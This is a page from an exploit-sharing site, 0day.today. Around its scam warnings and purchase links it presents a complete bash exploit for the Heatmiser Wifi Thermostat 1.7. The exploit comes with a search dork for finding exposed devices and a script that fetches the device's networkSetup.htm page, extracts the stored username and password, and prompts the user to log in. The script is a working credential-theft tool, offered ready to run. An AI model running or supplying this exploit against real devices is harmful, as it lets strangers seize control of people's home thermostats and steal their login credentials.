0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Heatmiser Wifi Thermostat 1.7 - Credential Disclosure Exploit
# Exploit Title: Heatmiser Wifi Thermostat 1.7 - Credential Disclosure # Dork: intitle:"Heatmiser Wifi Thermostat" # Exploit Author: d0wnp0ur # Original Discoverer: Andrew Tierney # Vendor Lnk: https://www.heatmiser.com/en/ # Product Link: https://www.heatmiser.com/en/wireless-thermostats/ # Tested on: Heatmiser Version 1.7 # CVE: N/A #!/bin/bash echo Heatmiser Smart Thermometer Hack echo By d0wnp0ur echo Usage: $0 \<ip\[:port\]\> \(Default is 80. If it doesn\'t work, try port 8081\) echo This tool gets the username and password of a vulnerable Heatmiser thermostat echo Deleting old files rm networkSetup.htm* echo Copying disclosing page wget http://$1/networkSetup.htm echo Getting Username and Password echo Username: cat networkSetup.htm | grep "User" | grep "Name:" | awk -F 'value=' '{print $2}' | cut -d '"' -f 2 echo Password: cat networkSetup.htm | grep "User" | grep "Password:" |grep -v -i "confirm" | awk -F 'value=' '{print $2}' | cut -d '"' -f 2 echo Success! Log in to the web interface with the above credentials. echo http://$1 # 0day.today [2024-12-25] #